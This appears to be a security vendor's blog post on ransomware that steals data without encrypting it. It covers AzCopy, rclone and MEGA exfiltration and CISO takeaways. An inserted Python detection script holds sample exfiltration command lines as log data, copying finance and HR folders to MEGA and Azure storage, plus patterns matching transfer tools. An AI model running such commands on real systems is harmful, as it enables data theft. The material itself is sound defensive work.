In Morphisec’s recent CTO Briefing, The State of Ransomware, CTO Michael Gorelik outlined one of the most concerning shifts in today’s ransomware landscape: a growing number of attacks no longer use encryption at all.

Instead, attackers silently exfiltrate sensitive data—often over weeks or months—and then extort organizations long after the initial compromise. This “ransomware without encryption” approach is expanding quickly because it carries less risk for attackers, is harder for defenders to spot, and is almost impossible for victims to investigate once logs have expired.


A New Kind of Ransomware—Without Encryption

Traditional ransomware depends on encryption. The modern variant depends on something far harder to detect, namely:

Stealthy data exfiltration

Minimal malware footprint

Abuse of trusted tools and cloud services

Delayed extortion that frustrates forensic investigation

During the briefing, Michael explained that attackers no longer need loud encryption mechanisms to trigger a crisis. Exfiltration-only attacks remove much of the risk—and complexity—associated with encrypting systems. They also leave defenders unsure about what data was taken, when it happened, or how it occurred.

Here’s why adversaries are moving toward pure exfiltration:

Encryption is noisy; exfiltration can remain silent

EDR tools are stronger at preventing malware than at detecting data theft

The extortion still works; victims fear regulatory consequences

Negotiations favor attackers when proof is limited

Organizations can recover systems—but not stolen data

The outcome? Victims still pay—even without encryption—a trend discussed in both the briefing and Morphisec’s blog Why Ransomware Victims Still Pay.

How Modern Exfiltration-Only Attacks Operate

The CTO briefing detailed several real-world techniques recently used against organizations running leading EDR solutions. Many of these intrusions persisted undetected for weeks.

1. Azure Copy Exfiltration

One particularly troubling pattern: attackers increasingly rely on Azure Copy (Microsoft's AzCopy command-line utility for Azure Storage) to disguise data theft as routine cloud activity.

Because Azure is widely used for storage and backups, data transfers to Azure endpoints often fail to raise alerts.

Michael noted that across multiple Q3 and Q4 incidents, Azure Copy was the primary exfiltration method—chosen precisely because it blends into normal operations.

This trend is also reflected in Morphisec’s analysis of recent ransomware campaigns.

2. RClone, Mega, and Bitbucket Channels

Attackers commonly leverage:

RClone

MEGA (mega.nz) uploads

Bitbucket repositories

Custom cloud-sync scripts

These tools resemble legitimate backup traffic. Without deep network visibility—which many organizations lack—these transfers go unnoticed.

3. Abuse of Legitimate IT Utilities

Data theft often relies on tools already present in the environment.

Michael highlighted incidents involving:

Advanced IP Scanner

Zenmap

PowerShell

Robocopy

Portable Node.js modules

Because these utilities are standard in IT operations, they blend in easily. Modern ransomware depends less on custom malware and more on abusing trusted tools that are already inside the network.
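The three patterns above (AzCopy uploads that look like backups, rclone and MEGA transfers, and renamed or living-off-the-land utilities) share one property: each is visible in ordinary endpoint and egress telemetry if someone looks for it. The following is an added detection sketch, not code from the briefing or from Morphisec, written to show what "visibility into outbound data flows" can mean in practice. All log records are constructed for the example; the byte threshold, correlation window, the `KNOWN_BACKUP_PAIRS` allow-list, and the host and account names are assumptions to be tuned to a real environment.

```python
"""Detection sketch for exfiltration-only ransomware tradecraft.

Three checks over constructed endpoint and egress logs:
  1. execution of cloud transfer tooling (AzCopy, rclone, MEGAcmd), including
     renamed binaries recognised by the shape of their command line;
  2. large outbound volume to cloud-storage endpoints, with an allow-list for
     documented backup jobs so legitimate traffic does not page anyone;
  3. correlation of 1 and 2 on the same host within a window, raised to high.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Transfer tools that rarely belong on a workstation or file server.
SUSPECT_IMAGES = {"azcopy.exe", "rclone.exe", "megacmd.exe", "mega-put.exe"}

# Command-line shapes that identify the tool even when the binary is renamed.
CMDLINE_PATTERNS = [
    ("AzCopy upload with SAS token",
     re.compile(r"https://[\w.-]+\.blob\.core\.windows\.net/\S*\?\S*\bsv=", re.I)),
    ("rclone remote syntax (binary may be renamed)",
     re.compile(r"\b(copy|sync|move)\s+\S+\s+[A-Za-z][\w-]+:\S*", re.I)),
]

# Egress destinations that blend in with backup traffic.
STORAGE_HOSTS = re.compile(
    r"(\.blob\.core\.windows\.net|\.mega\.co\.nz|\bmega\.nz|\bbitbucket\.org)$", re.I)

BYTES_THRESHOLD = 500 * 1024 * 1024      # assumption: tune per environment
CORRELATION_WINDOW = timedelta(hours=6)  # assumption: tune per environment
# Host/destination pairs with a documented backup job (assumed inventory).
KNOWN_BACKUP_PAIRS = {("BK02", "backup01.blob.core.windows.net")}

PROCESS_EVENTS = [  # constructed Sysmon-style process creation records
    {"ts": "2025-10-02T01:12:07", "host": "FS01", "user": "svc_backup",
     "image": r"C:\ProgramData\sys\svchost.exe",
     "cmdline": r"svchost.exe copy D:\Finance mega:q3 --transfers 16 --bwlimit 4M"},
    {"ts": "2025-10-02T09:30:44", "host": "WS-042", "user": "jdoe",
     "image": r"C:\Users\jdoe\Downloads\azcopy.exe",
     "cmdline": r'azcopy.exe copy "D:\HR" "https://acct.blob.core.windows.net/in?sv=2022-11-02&sig=x" --recursive'},
    {"ts": "2025-10-02T22:00:01", "host": "BK02", "user": "svc_backup",
     "image": r"C:\Windows\System32\Robocopy.exe",
     "cmdline": r"Robocopy.exe D:\Shares \\nas01\backup /MIR /R:1 /W:1"},
]
NET_EVENTS = [  # constructed proxy/firewall egress records (bytes sent)
    {"ts": "2025-10-02T01:15:00", "host": "FS01", "dst": "api.mega.co.nz", "bytes_out": 300 << 20},
    {"ts": "2025-10-02T01:40:00", "host": "FS01", "dst": "api.mega.co.nz", "bytes_out": 350 << 20},
    {"ts": "2025-10-02T09:31:10", "host": "WS-042", "dst": "acct.blob.core.windows.net", "bytes_out": 12 << 20},
    {"ts": "2025-10-02T22:05:00", "host": "BK02", "dst": "backup01.blob.core.windows.net", "bytes_out": 2 << 30},
    {"ts": "2025-10-02T11:00:00", "host": "WS-042", "dst": "www.example.com", "bytes_out": 40 << 20},
]


def score_process(ev):
    """Return a reason if the process event looks like transfer tooling, else None."""
    image = ev["image"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if image in SUSPECT_IMAGES:
        return f"known transfer tool {image}"
    for label, pattern in CMDLINE_PATTERNS:
        if pattern.search(ev["cmdline"]):
            return f"command line matches {label}"
    return None


def storage_egress(net_events):
    """Aggregate bytes sent per (host, destination) for cloud-storage destinations,
    keeping timestamps so the totals can be correlated with process events."""
    totals = defaultdict(lambda: {"bytes": 0, "times": []})
    for ev in net_events:
        if not STORAGE_HOSTS.search(ev["dst"]):
            continue
        entry = totals[(ev["host"], ev["dst"])]
        entry["bytes"] += ev["bytes_out"]
        entry["times"].append(datetime.fromisoformat(ev["ts"]))
    return totals


def detect(process_events, net_events):
    """Return alerts as dicts {severity, host, reason}."""
    alerts, tool_hits = [], defaultdict(list)
    for ev in process_events:
        reason = score_process(ev)
        if reason:
            tool_hits[ev["host"]].append(datetime.fromisoformat(ev["ts"]))
            alerts.append({"severity": "medium", "host": ev["host"],
                           "reason": f"{reason} ({ev['user']})"})
    for (host, dst), entry in storage_egress(net_events).items():
        if (host, dst) in KNOWN_BACKUP_PAIRS or entry["bytes"] < BYTES_THRESHOLD:
            continue  # documented backup job, or too small to care about
        correlated = any(abs(t - p) <= CORRELATION_WINDOW
                         for t in entry["times"] for p in tool_hits[host])
        alerts.append({"severity": "high" if correlated else "medium", "host": host,
                       "reason": f"{entry['bytes'] >> 20} MiB sent to {dst}"
                                 + (" after transfer-tool execution" if correlated else "")})
    return alerts


if __name__ == "__main__":
    for a in detect(PROCESS_EVENTS, NET_EVENTS):
        print(a["severity"].upper(), a["host"], a["reason"])
```

Run as-is, the script raises a high-severity alert for FS01 (a renamed rclone followed by 650 MiB to MEGA), a medium alert for the AzCopy execution on WS-042 (only 12 MiB sent, so volume alone would not fire), and nothing for BK02, whose nightly 2 GiB push to Azure Storage is on the allow-list. The command-line patterns matter because the image name is the first thing an intruder changes; the allow-list matters because, as the briefing notes, the whole point of these channels is that they resemble legitimate backup traffic, and a rule that pages on every upload to Azure is a rule that gets disabled.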

4. Zero Encryption, Zero Alerts

Without encryption, there is:

No process behavior that looks like malware

No mass file renaming

No CPU spikes

No filesystem triggers

This allows attackers to steal data months before contacting victims—sometimes via email, encrypted messages, or even physical mail, as Michael described.

Why These Attacks Are Especially Dangerous for CISOs

Michael emphasized a difficult reality during the briefing: “When attackers only exfiltrate data, most organizations can’t determine what was stolen—or even if data was stolen at all.”

Forensics become extremely difficult
Logs expire. Cloud activity blends into normal usage. Without encryption events, there’s no clear breach moment.

Organizations can’t disprove attacker claims
Adversaries know this. Fake exfiltration threats are increasing because victims struggle to verify or refute them.

Regulatory exposure remains high
HIPAA, GDPR, PCI DSS and the SEC cyber disclosure rules all turn on whether data was accessed, not on whether it was encrypted. If data was accessed, disclosure may be required.

Backups provide no real protection
Backups restore systems; they cannot undo leaked data.

In Morphisec’s Why Ransomware Victims Still Pay analysis, reputational damage and compliance risk were key drivers behind ransom payments—even in the absence of encryption.

What CISOs Can Do: Takeaways from the CTO Briefing

Michael shared several practical recommendations:

Shift from detection to preemptive defense — You can’t reliably detect activity that looks normal. Preventing footholds is critical.

Increase visibility into outbound data flows — Especially cloud services and third-party sync tools.

Strengthen identity, MFA, and remote access controls — Many exfiltration attacks begin with a single compromised account.

Validate exfiltration claims before engaging — Bluffing is on the rise. IR teams must confirm evidence before negotiations.

Secure non-agent assets — Gateways, NAS devices, and backup servers are frequent exfiltration launch points.

Exfiltration Is the New Front Line of Ransomware

Encryption may now be optional—but extortion is not.

Attackers have adopted a quieter, more effective model that sidesteps detection tuned for encryption events. By stealing data instead of encrypting systems, ransomware groups lower their own risk while increasing their leverage over victims.

To see how attackers are shifting to exfiltration-only campaigns—and how preemptive cyber defense can stop them before they start—download Morphisec’s CTO Briefing: The State of Ransomware – Executive Report. The report includes detailed attack-chain analysis, recent case studies, emerging ransomware group tactics, and predictions for 2026.